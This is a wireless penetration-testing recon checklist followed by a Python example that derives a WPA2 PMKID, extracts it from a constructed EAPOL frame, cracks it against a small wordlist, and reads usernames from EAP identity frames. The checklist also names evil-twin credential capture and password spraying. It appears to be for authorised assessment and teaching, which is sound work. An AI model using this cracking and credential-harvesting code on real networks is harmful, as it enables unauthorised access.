Here are some questions you might ask yourself during the recon phase of a wireless assessment.
What are the SSIDs in scope?
What wireless security protocol is in use (WEP, WPA, WPA2, WPA3)?
What is the network mode (Personal or Enterprise)?
Are there any open networks?
Are there any hidden networks (SSID not broadcast)?
Identify the access point manufacturer (e.g. from the BSSID OUI).
Identify the guest and corporate networks.
Identify the authentication method (PSK, EAP-PEAP, EAP-TLS, etc.).
Check for a captive portal.
Are there any clients connected? If so, on which channels?
Is Wi-Fi Protected Setup (WPS) enabled on WPA/WPA2-PSK networks?
Is there any filtering that prevents devices from joining the network (e.g. MAC filtering)?
Can you bypass the captive portal (DNS tunneling, MAC spoofing)?
Test for network segmentation. When connected to the guest network, can you reach assets in the corporate network?
Test for client isolation. When connected to the guest network, can you reach other clients in the same subnet?
Can you capture 4-way handshakes?
Test the robustness of the keys. Can you crack the PSK?
Are there any known vulnerabilities affecting the SOHO router?
Can you retrieve Active Directory credentials with an Evil-Twin attack?
In a WPA-Enterprise network, test certificate validation on both the client and the server side.
Can you password spray the Enterprise authentication (e.g. domain accounts over EAP-PEAP)?
Have you verified egress traffic restrictions?
Is the same public IP address shared between the corporate and guest wireless networks?
Are the WPA/WPA2-PSK networks vulnerable to the PMKID attack?
Can you collect usernames by capturing EAP frames (e.g. EAP-Response/Identity)?
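The two capture-based checks above (PMKID attack on WPA/WPA2-PSK and username collection from EAP frames) are worth understanding at the byte level before reaching for hcxdumptool or hashcat. The following is an added example, not code from the original page: it derives the PMK and PMKID the way a WPA2-PSK access point does (PBKDF2-HMAC-SHA1 over the passphrase and SSID, then HMAC-SHA1-128 over "PMK Name" || AP MAC || client MAC), extracts a PMKID from the RSN KDE of an EAPOL-Key message 1, runs a small offline dictionary check against it, and pulls the identity out of an EAP-Response/Identity frame. The SSID, MAC addresses, passphrase, wordlist and frames are all constructed for the demo.

```python
import hashlib
import hmac

# Constructed sample values (not from any real network)
SSID = "CorpWiFi"
AP_MAC = bytes.fromhex("001122334455")   # authenticator address (AA)
STA_MAC = bytes.fromhex("66778899aabb")  # supplicant address (SPA)
WORDLIST = ["password", "letmein", "Summer2023!", "Winter2023!"]
RSN_PMKID_KDE = bytes.fromhex("000fac04")  # OUI 00:0f:ac, data type 4 = PMKID


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """WPA/WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def pmkid_from_pmk(pmk: bytes, ap_mac: bytes, client_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA): first 16 bytes of the tag."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + client_mac, hashlib.sha1).digest()[:16]


def build_eapol_m1(pmkid: bytes, anonce: bytes = b"\x11" * 32) -> bytes:
    """Constructed EAPOL-Key message 1 of the 4-way handshake carrying a PMKID KDE."""
    kde = bytes([0xDD, 20]) + RSN_PMKID_KDE + pmkid  # KDE tag 0xdd, length 20 (4 + 16)
    body = (
        bytes([2])                      # descriptor type 2 = RSN (WPA1 uses 254)
        + (0x008A).to_bytes(2, "big")   # key info: pairwise, ACK, HMAC-SHA1 version 2
        + (16).to_bytes(2, "big")       # key length (CCMP)
        + (1).to_bytes(8, "big")        # replay counter
        + anonce
        + bytes(16) + bytes(8) + bytes(8) + bytes(16)  # IV, RSC, reserved, MIC (zero in M1)
        + len(kde).to_bytes(2, "big") + kde
    )
    return bytes([2, 3]) + len(body).to_bytes(2, "big") + body  # EAPOL v2, type 3 = Key


def extract_pmkid(eapol: bytes):
    """Walk the Key Data KDEs of an EAPOL-Key frame; return the PMKID or None."""
    # Offsets: EAPOL hdr 0-3, descriptor 4, key info 5-6, key len 7-8, replay 9-16,
    # nonce 17-48, IV 49-64, RSC 65-72, reserved 73-80, MIC 81-96, key data len 97-98
    if len(eapol) < 99 or eapol[1] != 3 or eapol[4] != 2:
        return None
    key_data_len = int.from_bytes(eapol[97:99], "big")
    key_data = eapol[99:99 + key_data_len]
    i = 0
    while i + 2 <= len(key_data):
        tag, length = key_data[i], key_data[i + 1]
        value = key_data[i + 2:i + 2 + length]
        if tag == 0xDD and length >= 20 and value[:4] == RSN_PMKID_KDE:
            return value[4:20]
        i += 2 + length
    return None


def crack_pmkid(pmkid: bytes, ssid: str, ap_mac: bytes, client_mac: bytes, wordlist):
    """Offline dictionary check: no client or handshake needed once a PMKID is captured."""
    for candidate in wordlist:
        guess = pmkid_from_pmk(pmk_from_passphrase(candidate, ssid), ap_mac, client_mac)
        if hmac.compare_digest(guess, pmkid):
            return candidate
    return None


def build_eap_identity(identity: str) -> bytes:
    """Constructed EAP-Response/Identity: code 2, id 1, length, type 1, identity."""
    data = identity.encode()
    return bytes([2, 1]) + (5 + len(data)).to_bytes(2, "big") + bytes([1]) + data


def eap_identity(eap: bytes):
    """Return the identity from an EAP-Response/Identity frame (code 2, type 1), else None."""
    if len(eap) < 5:
        return None
    code, length = eap[0], int.from_bytes(eap[2:4], "big")
    if code != 2 or length < 5 or length > len(eap) or eap[4] != 1:
        return None
    return eap[5:length].decode("utf-8", "replace")  # slice to length: 802.1X frames may be padded


if __name__ == "__main__":
    captured = extract_pmkid(build_eapol_m1(pmkid_from_pmk(pmk_from_passphrase("Summer2023!", SSID), AP_MAC, STA_MAC)))
    print("PMKID:", captured.hex())
    print("PSK recovered:", crack_pmkid(captured, SSID, AP_MAC, STA_MAC, WORDLIST))
    print("EAP identity:", eap_identity(build_eap_identity("jdoe@corp.example")))
```

Two caveats a practitioner should keep in mind: the AP only includes the PMKID KDE in message 1 when it supports PMKSA caching or 802.11r, so not every WPA2-PSK network exposes it, and in EAP-PEAP/EAP-TTLS the cleartext EAP-Response/Identity carries the outer identity, which a well-configured supplicant may anonymize (the real username travels inside the TLS tunnel).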